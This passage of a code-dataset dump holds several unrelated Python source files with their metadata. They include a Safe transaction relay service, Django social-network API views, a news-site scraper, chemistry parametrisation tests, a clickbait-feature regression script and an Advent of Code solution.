hasattr(cls, \"instance\"):\n del cls.instance\n\n\nclass RelayService:\n def __init__(self, safe_service: SafeService, gas_station: GasStation):\n self.safe_service = safe_service\n self.gas_station = gas_station\n\n def __getattr__(self, attr):\n return getattr(self.safe_service, attr)\n\n def _check_refund_receiver(self, refund_receiver: str) -> bool:\n \"\"\"\n We only support tx.origin as refund receiver right now\n In the future we can also accept transactions where it is set to our service account to receive the payments.\n This would prevent that anybody can front-run our service\n \"\"\"\n return refund_receiver == NULL_ADDRESS\n\n # FIXME Estimate everything in one method, same with Safe info\n def estimate_tx_gas_price(self, gas_token: Union[str, None] = None):\n gas_token = gas_token or NULL_ADDRESS\n gas_price_fast = self.gas_station.get_gas_prices().fast\n\n if gas_token != NULL_ADDRESS:\n try:\n gas_token_model = Token.objects.get(address=gas_token, gas=True)\n return gas_token_model.calculate_gas_price(gas_price_fast)\n except Token.DoesNotExist:\n raise InvalidGasToken('Gas token %s not valid' % gas_token)\n else:\n return gas_price_fast\n\n def send_multisig_tx(self,\n safe_address: str,\n to: str,\n value: int,\n data: bytes,\n operation: int,\n safe_tx_gas: int,\n data_gas: int,\n gas_price: int,\n gas_token: str,\n refund_receiver: str,\n signatures: bytes,\n tx_sender_private_key=None,\n tx_gas=None) -> Tuple[str, any]:\n \"\"\"\n This function calls the `send_multisig_tx` of the SafeService, but has some limitations to prevent abusing\n the relay\n :return: Tuple(tx_hash, tx)\n :raises: InvalidMultisigTx: If user tx cannot go through the Safe\n \"\"\"\n\n data = data or b''\n gas_token = gas_token or NULL_ADDRESS\n refund_receiver = refund_receiver or NULL_ADDRESS\n to = to or NULL_ADDRESS\n\n # Make sure refund receiver is set to 0x0 so that the contract refunds the gas costs to tx.origin\n if not self._check_refund_receiver(refund_receiver):\n raise InvalidRefundReceiver(refund_receiver)\n\n # if gas_price == 0:\n # raise RefundMustBeEnabled('Tx internal gas price cannot be 0')\n\n threshold = self.retrieve_threshold(safe_address)\n number_signatures = len(signatures) // 65 # One signature = 65 bytes\n if number_signatures < threshold:\n raise SignaturesNotFound('Need at least %d signatures' % threshold)\n\n # If gas_token is specified, we see if the `gas_price` matches the current token value and use as the\n # external tx gas the fast gas price from the gas station.\n # If not, we just use the internal tx gas_price for the gas_price\n # Gas price must be at least >= standard gas price\n current_gas_prices = self.gas_station.get_gas_prices()\n current_fast_gas_price = current_gas_prices.fast\n current_standard_gas_price = current_gas_prices.standard\n\n if gas_token != NULL_ADDRESS:\n try:\n gas_token_model = Token.objects.get(address=gas_token, gas=True)\n estimated_gas_price = gas_token_model.calculate_gas_price(current_standard_gas_price)\n if gas_price < estimated_gas_price:\n raise GasPriceTooLow('Required gas-price>=%d to use gas-token' % estimated_gas_price)\n # We use gas station tx gas price. We cannot use internal tx's because is calculated\n # based on the gas token\n except Token.DoesNotExist:\n raise InvalidGasToken('Gas token %s not valid' % gas_token)\n # else:\n # if gas_price < current_standard_gas_price:\n # # raise GasPriceTooLow('Required gas-price>=%d' % current_standard_gas_price)\n\n # We use fast tx gas price, if not txs could we stuck\n tx_gas_price = current_fast_gas_price\n\n return self.safe_service.send_multisig_tx(\n safe_address,\n to,\n value,\n data,\n operation,\n safe_tx_gas,\n data_gas,\n gas_price,\n gas_token,\n refund_receiver,\n signatures,\n tx_sender_private_key=tx_sender_private_key,\n tx_gas=tx_gas,\n tx_gas_price=tx_gas_price)\n\n def send_multisig_subtx(self,\n subscriptions_to_execute: any,\n tx_sender_private_key=None,\n tx_gas=None) -> Tuple[str, any]:\n \"\"\"\n This function calls the `send_multisig_subtx` of the SafeService, but has some limitations to prevent abusing\n the relay\n :return: Tuple(tx_hash, tx)\n :raises: InvalidMultisigTx: If user tx cannot go through the Safe\n \"\"\"\n\n current_gas_prices = self.gas_station.get_gas_prices()\n current_fast_gas_price = current_gas_prices.fast\n current_standard_gas_price = current_gas_prices.standard\n\n tx_gas_price = current_fast_gas_price\n\n return self.safe_service.send_multisig_subtx(\n subscriptions_to_execute,\n tx_sender_private_key=tx_sender_private_key,\n tx_gas=tx_gas,\n tx_gas_price=tx_gas_price)\n","sub_path":"safe_relay_service/relay/relay_service.py","file_name":"relay_service.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"511281413","text":"from typing import Sequence, Iterable\n\nfrom pypika import Query\n\nfrom app.models import Relic\nfrom app.database import open_cursor\n\nimport dataclasses\n\n\nclass RelicDao:\n def insert_all(self, relics: Sequence[Relic]):\n raise NotImplementedError\n\n def get_all(self) -> Sequence[Relic]:\n raise NotImplementedError\n\n\nclass RelicSqlDao(RelicDao):\n def get_all(self) -> Sequence[Relic]:\n relic_table = Relic.table()\n query = Query.from_(relic_table).select('*')\n\n with open_cursor() as (cursor, connection):\n cursor.execute(str(query))\n return [Relic(**row) for row in cursor]\n\n def insert_all(self, relics: Iterable[Relic]):\n if not relics:\n return []\n\n fields = Relic.fields()\n\n query = Query.into(Relic.table()) \\\n .columns(*fields) \\\n\n for relic in relics:\n query = query.insert(*(getattr(relic, field) for field in fields))\n\n with open_cursor() as (cursor, connection):\n cursor.execute(str(query))\n connection.commit()\n","sub_path":"app/dao/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"584209164","text":"import pandas as pd\nimport numpy as np\nimport sklearn\n\nclickbait_percentage = pd.read_csv('percents.csv')\ndic_source_clickbait = {row['source']: row['percent_clickbait'] for i, row in clickbait_percentage.iterrows()}\naverage_clickbait = clickbait_percentage.percent_clickbait.sum() / len(clickbait_percentage)\ndata = pd.read_csv('edata_classified.csv')\n\ndef add_clickbait(source):\n if source.startswith('www.'):\n source = source[4:]\n if source in dic_source_clickbait:\n return dic_source_clickbait[source]\n return average_clickbait\n \ndata['clickbait_percentage'] = data['source'].apply(add_clickbait)\n\n\ndef get_features(data, source_len = 724):\n \"\"\"\n features for claims\n \"\"\"\n dic_f = {} # claimCount -> features\n \n for i in range(len(data)):\n row = data.iloc[i]\n stance = row['articleHeadlineStance']\n stance_id = -1 if stance == 'against' else 0 if stance == 'observing'\\\n else 1\n source = row.sourceCount - 1 # 1-index to 0-index\n claim = row.claimCount\n \n if claim not in dic_f: dic_f[claim] = np.zeros((source_len,))\n dic_f[claim][source] = stance_id\n \n #claims = dic_f.keys()\n return dic_f\n\n\ndef extract_truth_labels(data):\n claims = sorted(data.claimCount.unique().tolist())\n l = [''] * len(claims)\n for i in range(len(data)):\n row = data.iloc[i]\n truth = row.claimTruth\n claim = row.claimCount\n claimIdx = claims.index(claim)\n l[claimIdx] = truth \n return (claims, l)\n\n\ndef build_veracity_prediction_matrix():\n dic_f = get_features(data)\n \n (claims, veracity) = extract_truth_labels(data)\n \n n = len(claims)\n m = dic_f.items()[0][1].shape[0]\n \n F = np.zeros((n, m))\n for i, c in enumerate(claims): F[i, :] = dic_f[c]\n \n return (claims, F, veracity)\n\n\nclaims, F, vera = build_veracity_prediction_matrix()\nclf = sklearn.linear_model.LogisticRegression()\n# This is the average accuracy for the original matrix (using cross validation)\nnp.mean(sklearn.model_selection.cross_val_score(clf, F, vera, cv=8))\n\n# now slap the percentage of non-clickbait into the feature matrix\nG = F.copy()\nfor i, row in data.iterrows():\n source_index = row['sourceCount'] - 1\n percent_clickbait = row['clickbait_percentage']\n G[:, source_index] = F[:, source_index] * (1 - percent_clickbait * 0.01)\n \n\nclf_g = sklearn.linear_model.LogisticRegression()\n# This is the average accuracy for the matrix with clickbait slapped\nnp.mean(sklearn.model_selection.cross_val_score(clf_g, G, vera, cv=8))\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"407394862","text":"from rest_framework import generics\nfrom rest_framework.views import APIView\nfrom .serializers import *\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\nfrom rest_framework.response import Response\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.db.models import Sum\n\n\nclass PostListAPIView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = []\n\n def get(self, request, *args):\n content_type = request.GET.get(\"content_type\") # Object's type that contains the posts\n object_id = request.GET.get(\"object_id\") # ID of that object\n post_id = request.GET.get(\"post_id\") # Get single post\n\n if post_id:\n try:\n queryset = self.get_queryset().get(id=post_id)\n serializer = self.serializer_class(queryset)\n return Response({\"data\": serializer.data})\n except:\n return Response({\"data\": \"Cannot get the post by provided id\"})\n\n elif content_type == 'News':\n queryset = self.get_queryset().filter(\n Q(related_community__followers=request.user) | Q(creator__profile__followers__user=request.user) | Q(\n creator=request.user)).distinct()\n elif content_type == 'Community':\n queryset = self.get_queryset().filter(related_community=Community.objects.get(id=object_id))\n elif content_type == 'User':\n queryset = self.get_queryset().filter(creator=User.objects.get(id=object_id))\n else:\n return Response({\"data\": \"Request has no 'content_type' or 'object_id' field\"})\n\n serializer = self.serializer_class(queryset, many=True)\n page = self.paginate_queryset(serializer.data)\n return self.get_paginated_response(page)\n\n\nclass Rating(APIView):\n permission_classes = [IsAuthenticatedOrReadOnly]\n model_by_type = {'post': Post, 'comment': Comment}\n vote_types = {'like': 1, 'dislike': -1}\n\n def get(self, request): # Getting rating count for Post or Comment object\n content_type = ContentType.objects.get(model=request.data.get(\"content_type\"))\n object_id = request.GET.get(\"object_id\")\n try:\n rating_count = LikeDislike.objects.filter(\n content_type=ContentType.objects.get(model=content_type), object_id=object_id).aggregate(\n Sum('vote')).get('vote__sum') or 0\n return Response({\"rating_count\": rating_count})\n except:\n return Response({\"errors\": \"Parameters must contain 'content_type' and 'object_id' fields\"})\n\n def post(self, request):\n content_type = ContentType.objects.get(model=request.data.get(\"content_type\"))\n object_id = request.data.get(\"object_id\")\n vote_type = self.vote_types.get(request.data.get(\"vote_type\"))\n try:\n like_dislike = LikeDislike.objects.get(user=request.user, content_type=content_type, object_id=object_id)\n if like_dislike.vote is not vote_type:\n like_dislike.vote = vote_type\n like_dislike.save(update_fields=['vote'])\n else:\n like_dislike.delete()\n except:\n LikeDislike.objects.create(user=request.user, vote=vote_type, content_type=content_type,\n object_id=object_id)\n # Synchronizing the rating\n # obj = Comment.objects.get(pk=49)\n obj = self.model_by_type.get(request.data.get(\"content_type\")).objects.get(id=object_id)\n obj.rating = LikeDislike.objects.filter(\n content_type=content_type, object_id=object_id).aggregate(\n Sum('vote')).get('vote__sum') or 0\n obj.save()\n return Response({\"data\": \"You voted this\"})\n\n\nclass MyPostListApiView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = []\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset().filter(creator=request.user)\n serializer = self.serializer_class(queryset, many=True)\n page = self.paginate_queryset(serializer.data)\n return self.get_paginated_response(page)\n\n\nclass PostCreateAPIView(generics.CreateAPIView):\n serializer_class = PostPostSerializer\n permission_classes = [IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n if request.data.get(\"community\"):\n related_community = Community.objects.get(id=request.data.get(\"community\"))\n post = self.serializer_class(data=request.data)\n if post.is_valid():\n if request.user.id is related_community.creator.id:\n post.save(creator=request.user, related_community=related_community)\n return Response({\"data\": \"Post created successfully\"})\n else:\n return Response({\"data\": \"You aren't community creator\"})\n else:\n reposted = Post.objects.get(id=request.data.get(\"reposted_id\"))\n\n post = self.serializer_class(data=request.data)\n if post.is_valid():\n post.save(creator=request.user, reposted=reposted, reposted_community=reposted.related_community,\n reposted_creator=reposted.creator)\n return Response({\"data\": \"Post created successfully\"})\n\n\nclass CommentListAPIView(generics.ListAPIView):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n permission_classes = []\n\n def list(self, request, *args, **kwargs):\n comment_id = request.GET.get(\"comment_id\")\n post_id = request.GET.get(\"post_id\")\n if comment_id:\n queryset = self.get_queryset().get(id=comment_id)\n serializer = self.serializer_class(queryset)\n else:\n queryset = self.get_queryset().filter(related_post=Post.objects.get(id=post_id))\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass CommentCreateAPIView(generics.CreateAPIView):\n serializer_class = CommentPostSerializer\n permission_classes = [IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n comment = self.serializer_class(data=request.data)\n if comment.is_valid():\n comment.save(sender=request.user, related_post=Post.objects.get(id=request.data.get(\"related_post\")))\n return Response({\"data\": \"Comment sent successfully\"})\n\n\nclass DialogCreateAPIView(generics.CreateAPIView):\n serializer_class = DialogPostSerializer\n permission_classes = [IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n dialog = self.serializer_class(data=request.data)\n if dialog.is_valid():\n dialog.save(creator=request.user, invited_users=User.objects.filter(id=request.data.get(\"id\")))\n return Response({\"data\": \"Dialog created successfully\"})\n\n\nclass DialogListAPIView(generics.ListAPIView):\n queryset = Dialog.objects.all()\n serializer_class = DialogSerializer\n permission_classes = [IsAuthenticated]\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset().filter(Q(creator=request.user) | Q(invited_users=request.user))\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass MessageListAPIView(generics.ListAPIView):\n queryset = Message.objects.all()\n serializer_class = MessageSerializer\n permission_classes = [IsAuthenticated]\n\n # We must use POST request cause Axios doesn't allow to pass data through GET request\n def list(self, request, *args, **kwargs):\n dialog = Dialog.objects.get(id=request.GET.get(\"dialog\"))\n if bool(dialog.creator == request.user) | dialog.invited_users.filter(id=request.user.id).exists():\n queryset = self.get_queryset().filter(dialog=dialog)\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n else:\n return Response({\"data\": \"You aren't invited in this dialog\"})\n\n\nclass MessageCreateAPIView(generics.CreateAPIView):\n serializer_class = MessagePostSerializer\n permission_classes = [IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n dialog = Dialog.objects.get(id=request.data.get(\"dialog\"))\n message = self.serializer_class(data=request.data)\n if message.is_valid():\n if bool(dialog.creator == request.user) | dialog.invited_users.filter(id=request.user.id).exists():\n message.save(sender=request.user, dialog=dialog)\n dialog.last_message = request.data.get(\"text\")\n dialog.save()\n return Response({\"data\": \"Message sent successfully\"})\n\n\nclass CommunityListAPIView(generics.ListAPIView):\n queryset = Community.objects.all()\n serializer_class = CommunitySerializer\n permission_classes = []\n\n def list(self, request, *args, **kwargs): # We're using POST cause Axios doesn't allow to pass data through GET\n try:\n search = request.GET.get(\"search\")\n queryset = Community.objects.filter(Q(title__icontains=search) | Q(description__icontains=search))\n except:\n queryset = self.get_queryset()\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n def patch(self, request): # Find user's subscriptions\n user = User.objects.get(id=request.data.get('user'))\n queryset = Community.objects.filter(followers=user)\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass CommunityPostListAPIView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = []\n\n def list(self, request, *args, **kwargs):\n community = Community.objects.get(id=request.GET.get(\"community\"))\n queryset = self.get_queryset().filter(related_community=community)\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass CommunityCreateAPIView(generics.CreateAPIView):\n serializer_class = CommunityPostSerializer\n permission_classes = [IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n community = self.serializer_class(data=request.data)\n if community.is_valid():\n Photo.objects.create()\n community.save(creator=request.user)\n return Response({\"data\": \"Community created successfully\"})\n return Response({\"data\": \"Form isn't valid\"})\n\n\nclass FriendListAPIView(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n permission_classes = [IsAuthenticated]\n\n def list(self, request, *args, **kwargs):\n search = request.GET.get(\"search\")\n queryset = self.get_queryset().filter(Q(user__username__icontains=search.strip(' ')) |\n Q(user__email__icontains=search.strip(' ')))\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass FollowCommunity(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n community = Community.objects.get(id=request.data.get(\"community\"))\n if not community.followers.filter(id=request.user.id).exists():\n community.followers.add(request.user)\n return Response({\"data\": \"You followed this community\"})\n return Response({\"data\": \"You've already followed this community\"})\n\n def put(self, request): # We're checking whether user already followed this community\n community = Community.objects.get(id=request.data.get(\"community\"))\n if community.followers.filter(id=request.user.id).exists():\n return Response({\"data\": True})\n else:\n return Response({\"data\": False})\n\n def patch(self, request): # Unfollow community\n community = Community.objects.get(id=request.data.get(\"community\"))\n if community.followers.filter(id=request.user.id).exists():\n community.followers.remove(request.user)\n return Response({\"data\": \"You unfollowed this this community\"})\n else:\n return Response({\"data\": \"You haven't followed this community\"})\n\n\nclass FollowersListAPIView(generics.ListAPIView):\n queryset = FriendRequest.objects.all()\n serializer_class = FriendRequestSerializer\n permission_classes = [IsAuthenticated]\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset().filter(receiver=request.user)\n serializer = self.serializer_class(queryset, many=True)\n return Response({\"data\": serializer.data})\n\n\nclass FollowUser(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = User.objects.get(id=request.data.get(\"user\"))\n if not FriendRequest.objects.filter(Q(user=request.user) & Q(receiver=user)).exists():\n friend_request = FriendRequest.objects.create(user=request.user, receiver=user)\n request.user.profile.followers.add(friend_request)\n user.profile.followers.add(friend_request)\n return Response({\"data\": \"You followed this user\"})\n return Response({\"data\": \"You've already followed this user\"})\n\n def put(self, request): # We're checking whether user already followed\n user = User.objects.get(id=request.data.get(\"user\"))\n if user.profile.followers.filter(Q(user=request.user) & Q(receiver=user)).exists():\n return Response({\"data\": True})\n else:\n return Response({\"data\": False})\n\n def patch(self, request): # Unfollow user\n user = User.objects.get(id=request.data.get(\"user\"))\n if user.profile.followers.filter(Q(user=request.user) & Q(receiver=user)).exists():\n FriendRequest.objects.get(user=request.user, receiver=user).delete()\n return Response({\"data\": \"You unfollowed this this user\"})\n else:\n return Response({\"data\": \"You haven't followed this user\"})\n\n\nclass UserResponseRequest(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n friend_request = FriendRequest.objects.get(id=request.data.get(\"friend_request\"))\n if friend_request.receiver.id == request.user.id:\n friend_request.accepted = True\n friend_request.receiver.profile.friends.add(friend_request.user)\n friend_request.save()\n return Response({\"data\": \"Friend request accepted\"})\n return Response({\"data\": \"You aren't this request receiver\"})\n\n def patch(self, request):\n friend_request = FriendRequest.objects.get(id=request.data.get(\"friend_request\"))\n if friend_request.receiver.id == request.user.id:\n friend_request.accepted = False\n friend_request.receiver.profile.friends.remove(friend_request.user)\n friend_request.save()\n return Response({\"data\": \"Friend request refused\"})\n return Response({\"data\": \"You aren't this request receiver\"})\n\n\nclass GetCommunity(APIView):\n permission_classes = []\n\n def get(self, request):\n community = Community.objects.get(id=request.GET.get(\"community\"))\n serializer = CommunitySerializer(community)\n return Response({\"data\": serializer.data})\n\n\nclass GetProfile(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user_id = request.GET.get(\"user\")\n if user_id:\n user = User.objects.get(id=user_id)\n profile = Profile.objects.get(user=user)\n if user.id is request.user.id:\n current_profile = True\n else:\n current_profile = False\n else:\n profile = Profile.objects.get(user=request.user)\n current_profile = True\n serializer = ProfileSerializer(profile)\n return Response({\"data\": serializer.data, \"current_profile\": current_profile})\n\n\nclass Test(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n return Response({\"data\": str(obj)})\n","sub_path":"socnet_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"315020698","text":"\"\"\"\nTest each stage in run with multiple input options to make sure configs are handled.\n\"\"\"\nimport os\nimport shutil\n\nimport pytest\n\nfrom QUBEKit.ligand import Ligand\nfrom QUBEKit.run import Execute\nfrom QUBEKit.utils.file_handling import get_data\n\n\n@pytest.mark.parametrize(\n \"parameter_engine\",\n [\n pytest.param(\"antechamber\", id=\"antechamber\"),\n pytest.param(\"openff\", id=\"openff\"),\n pytest.param(\"xml\", id=\"xml\"),\n ],\n)\ndef test_parametrise_all(parameter_engine, tmpdir):\n \"\"\"\n For each parameter engine make sure the molecule is correctly parameterised.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"pyridine.sdf\"))\n mol.parameter_engine = parameter_engine\n if parameter_engine == \"xml\":\n shutil.copy(get_data(\"pyridine.xml\"), \"pyridine.xml\")\n param_mol = Execute.parametrise(molecule=mol, verbose=False)\n # make sure parameters have been found\n for i in range(param_mol.n_atoms):\n assert param_mol.NonbondedForce[i] != [0, 0, 0]\n\n\ndef test_parametrise_missing_file(tmpdir):\n \"\"\"\n If a missing file is provided make sure an error is raised.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"acetone.pdb\"))\n mol.home = os.getcwd()\n mol.parameter_engine = \"xml\"\n with pytest.raises(FileNotFoundError):\n _ = Execute.parametrise(molecule=mol, verbose=False)\n\n\ndef test_parametrise_none(tmpdir):\n \"\"\"\n If no engine is passed make sure we init the parameter holders but store nothing.\n \"\"\"\n with tmpdir.as_cwd():\n mol = Ligand.from_file(get_data(\"acetone.pdb\"))\n mol.parameter_engine = \"none\"\n param_mol = Execute.parametrise(molecule=mol, verbose=False)\n for i in range(param_mol.n_atoms):\n assert param_mol.NonbondedForce[i] == [0, 0, 0]\n","sub_path":"QUBEKit/tests/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"178436987","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\nimport re\nfrom xmlparser import Xmlparser\nfrom urllib.request import urlopen\nfrom urllib.parse import urlparse\nfrom pdbmodel import PdbModel\nfrom dateutil import parser\nfrom datetime import datetime\nimport time\n\nclass scraper:\n def __init__(self, url, scrapedata):\n self.scrapedata = scrapedata\n doc = self.get_doc(url)\n self.soup = BeautifulSoup(doc, 'lxml')\n self.db = PdbModel('atscraper')\n # print(eval('self.soup.find(itemprop=\"headline\").text'))\n # print(eval('self.soup.find(itemprop=\"description\").text'))\n # print(eval('self.soup.find(rel=\"author\").text'))\n # print(eval('self.soup.find(\"time\", itemprop=\"datePublished\").text'))\n # print(len(eval('self.soup.select(\"ol > li[role=article]\")')))\n\n def test(self):\n print(eval('self.soup.find(\"h1\", itemprop=\"headline\").text'))\n print(eval('self.soup.find(\"div\", itemprop=\"description\").text'))\n # print(eval('self.soup.find(\"span\", class_=\"shahor art-author\").text'))\n print(eval('self.soup.select_one(\"address > a > span[itemprop=\\'name\\']\").text').split('span')[0])\n # print(eval('self.soup.find(\"span\", class_=\"tb-counter adom ShualBold\")'))\n print(eval('self.soup.select(\"time > span\")[0].text'))\n print(eval('self.soup.select(\"time > span\")[1].text'))\n print(eval('eval(self.soup.find(\"span\", class_=\"count\").text)'))\n # print(eval('self.soup.find(\"span\", class_=\"count\").text'))\n # print(eval('self.soup.select_one(\"div.articleInfo > span\").text'))\n # print(eval('re.findall(r\"[\\w\\.-]+@[\\w\\.-]+\", self.soup.select(\"div.art-launch-date > a\")[0][\"href\"])[0]'))\n # print(eval('self.soup.find(\"time\", itemprop=\"datePublished\").text'))\n # print(len(eval('self.soup.select(\"ol > li[role=article]\")')))\n\n def trystuff(self):\n print(eval('(1, 2)')[0])\n\n def get_doc(self, url):\n html = urlopen(url)\n return html.read()\n # return requests.get(url).text\n\n def get_feedback_data(self):\n try:\n result = eval(self.scrapedata['scrape']['feedbacks'])\n except AttributeError:\n result = 0\n except Exception:\n result = 0\n return result\n\n def find_secid(self, code, sec):\n # chec = self.soup.find_all('a', href=re.compile('https://finance\\.themarker\\.com/quote/\\?mador=1&documentId=(.*?)'))\n result = eval(code)\n # print(result)\n alltags = []\n # links = [re.findall(r\"\"+sec+\"\", str(a))[0] for a in result]\n # chec = re.findall(r\"https://finance\\.themarker\\.com/quote/\\?mador=1\\&documentId=(.*?)?\\\"\", 'מגדלי הים התיכון')\n # chec = re.findall(r\"https://finance\\.themarker\\.com/quote/\\?mador=1\\&documentId=(.*?)?\\\"\", str(chec[0]))\n # return links\n for a in result:\n # print(str(a))\n chec = re.findall(r\"\"+sec+\"\", str(a))\n if (int(self.scrapedata['instrumentid'])):\n print(\"Check for Instrument ID\", self.scrapedata['instrumentid'])\n chec = self.db.sortInstrumentId(chec[0])\n if(chec):\n alltags.append(chec[0])\n\n return alltags\n # print(chec)\n\n def test_secid(self):\n chec = self.soup.find_all(onclick=re.compile(\"document.location.href='/capitalmarket/quote/generalview/(.*?)'\"))\n chec = re.findall(r\"document.location.href='/capitalmarket/quote/generalview/(.*?)?'\", str(chec[0]))\n print(chec)\n\n def get_data(self):\n data_text = {}\n # print(self.scrapedata['scrape'])\n\n # if(1):\n for i in self.scrapedata['scrape']:\n try:\n tag = i\n text = self.scrapedata['scrape'][i]\n result = {}\n if (tag == 'tag'):\n res = self.find_secid(text, self.scrapedata['sec_id'])\n\n elif (tag == 'feedback'):\n res = len(eval(text))\n else:\n res = eval(text)\n\n data_text[tag] = res\n except AttributeError:\n data_text[tag] = None\n except Exception:\n data_text[tag] = None\n self.compute(data_text)\n\n def get_history_links(self, doc, code):\n self.soup = BeautifulSoup(doc, 'lxml')\n return eval(code)\n\n def validateAllData(self, data):\n for i in data:\n if(data[i]) :\n return 1\n\n return None\n\n def compute(self, data):\n # print(data)\n #{'link': 'https://www.bizportal.co.il/shukhahon/messRss2.xml', 'instrumentid': '0', 'sec_id': \"document.location.href='/capitalmarket/quote/generalview/(.*?)?'\", 'scrape': {'header': 'self.soup.find(\"h1\", itemprop=\"headline\").text', 'sub-header': 'self.soup.find(\"div\", itemprop=\"description\").text', 'writer_name': 'self.soup.select_one(\"address > a > span[itemprop=\\\\\\'name\\\\\\']\").text', 'date': 'self.soup.select(\"time > span\")[0].text', 'time': 'self.soup.select(\"time > span\")[1].text', 'feedbacks': 'eval(self.soup.find(\"span\", class_=\"count\").text)', 'tag': 'self.soup.find_all(onclick=re.compile(\"document.location.href=\\'/capitalmarket/quote/generalview/(.*?)\\'\"))'}}\n dbData = {}\n url = self.scrapedata['link']\n # parsed_uri = urlparse('url')\n website = url.split(\"://\")[1].split(\"/\")[0]\n dbData['url'] = url\n dbData['website'] = website\n # dateobj = datetime.now()\n secondsSinceEpoch = time.time()\n dateobj = time.localtime(secondsSinceEpoch)\n dbData['created_at'] = str('%d-%d-%d %d:%d:%d' % (\ndateobj.tm_year, dateobj.tm_mon, dateobj.tm_mday, dateobj.tm_hour, dateobj.tm_min, dateobj.tm_sec))\n tags = []\n if(self.validateAllData(data)):\n for i in data:\n if(i == 'tag'):\n dbData['sec_id'] = str(len(data[i]))\n tags = data[i]\n elif(i == 'date'):\n if (data['time'] == None):\n dt = parser.parse(data[i])\n date = dt.date()\n times = dt.time()\n dbData['date'] = date\n dbData['time'] = times\n else:\n dbData['date'] = data[i]\n else:\n dbData[i] = str(data[i])\n\n\n\n self.db.insertScrapeData(dbData, tags)\n\n\n\n\n\n\n# scrap = scraper('http://www.bizportal.co.il/shukhahon/biznews02.shtml?mid=767561',{})\n# print(scrap.soup.prettify())\n# scrap.test()\n# scrap.trystuff()\n# scrap.test_secid()\n# print(scrap.find_secid(\"self.soup.find_all('a', href=re.compile('/stocks/home/0,7340,L-3959-(.*?)'))\", '/stocks/home/0,7340,L-3959-(.*?)?,'))","sub_path":"scrapermodel.py","file_name":"scrapermodel.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"482718828","text":"import re\n\nfrom aocd import data\n\n\ndef splitter(s):\n pattern = r\"\\[([a-z]*)\\]\"\n ins = re.findall(pattern, s)\n outs = re.sub(pattern, \" \", s).split()\n return ins, outs\n\n\ndef chunker(s, size):\n i = 0\n while len(s[i : i + size]) == size:\n yield s[i : i + size]\n i += 1\n\n\ndef has_abba(s):\n for a, b, b_, a_ in chunker(s, 4):\n if a == a_ and b == b_ and a != b:\n return True\n return False\n\n\ndef gen_aba(s):\n for a, b, a_ in chunker(s, 3):\n if a == a_ and a != b:\n yield a + b + a\n\n\ndef has_aba(s):\n return bool(next(gen_aba(s), False))\n\n\ndef support_tls(s):\n ins, outs = splitter(s)\n return has_abba(\".\".join(outs)) and not has_abba(\".\".join(ins))\n\n\ndef support_ssl(s):\n ins, outs = splitter(s)\n for a, b, a in gen_aba(\"..\".join(ins)):\n bab = b + a + b\n if bab in \"..\".join(outs):\n return True\n return False\n\n\nassert support_tls(\"abba[mnop]qrst\")\nassert not support_tls(\"abcd[bddb]xyyx\")\nassert not support_tls(\"aaaa[qwer]tyui\")\nassert support_tls(\"ioxxoj[asdfgh]zxcvbn\")\n\nassert support_ssl(\"aba[bab]xyz\")\nassert not support_ssl(\"xyx[xyx]xyx\")\nassert support_ssl(\"aaa[kek]eke\")\nassert support_ssl(\"zazbz[bzb]cdb\")\n\n\ntls = ssl = 0\nfor line in data.splitlines():\n tls += support_tls(line)\n ssl += support_ssl(line)\n\nprint(tls) # 115\nprint(ssl) # 231\n","sub_path":"aoc_wim/aoc2016/q07.py","file_name":"q07.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} 